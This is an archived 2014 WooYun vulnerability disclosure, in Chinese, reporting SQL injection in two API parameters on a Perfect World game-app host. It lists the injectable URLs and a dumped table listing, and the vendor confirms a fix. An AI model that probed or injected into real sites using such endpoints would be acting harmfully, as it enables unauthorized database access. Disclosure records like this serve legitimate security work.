乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-12: 细节已通知厂商并且等待厂商处理中 2014-06-13: 厂商已经确认,细节仅向厂商公开 2014-06-23: 细节向核心白帽子及相关领域专家公开 2014-07-03: 细节向普通白帽子公开 2014-07-13: 细节向实习白帽子公开 2014-07-27: 细节向公众公开
今天太累了,就不讲冷笑话了!
问题站点:
http://aapi.sd.wanmei.com/
看了下,各种接口注射链接:
http://aapi.sd.wanmei.com/index.php/api/goods/getList?limit=10&offset=0&usage=
usage参数存在注射
http://aapi.sd.wanmei.com/index.php/api/goods/getTransactionList?goods_id=&limit=10&offset=0
goods_id参数存在注射库:
information_schemasdapptest
表:
Database: sdapp[38 tables]+------------------------+| user || goods || goods_auction || goods_category || goods_order || goods_picture || goods_product || goods_reserve || goods_transaction || log_statistics || log_user_credits || log_user_init || module_apps || module_avatar || module_download_log || module_feedback || module_ios_comment_log || module_ios_push_item || module_ios_token || module_ios_token_temp || module_message || module_ring || module_wallpaper || news || news_comment || news_share_log || news_template || sys_user || toppic || toppic_comment || toppic_comment_reply || toppic_vote || user_checkin_log || yyl_balance || yyl_log || yyl_picture || yyl_picture_group || yyl_rank_reward |+------------------------+
其他的就不贴出来了,赶快修复吧
注射链接:
你们懂的
危害等级:中
漏洞Rank:10
确认时间:2014-06-13 10:08
感谢洞主对完美世界的关注,已修补。谢谢!
暂无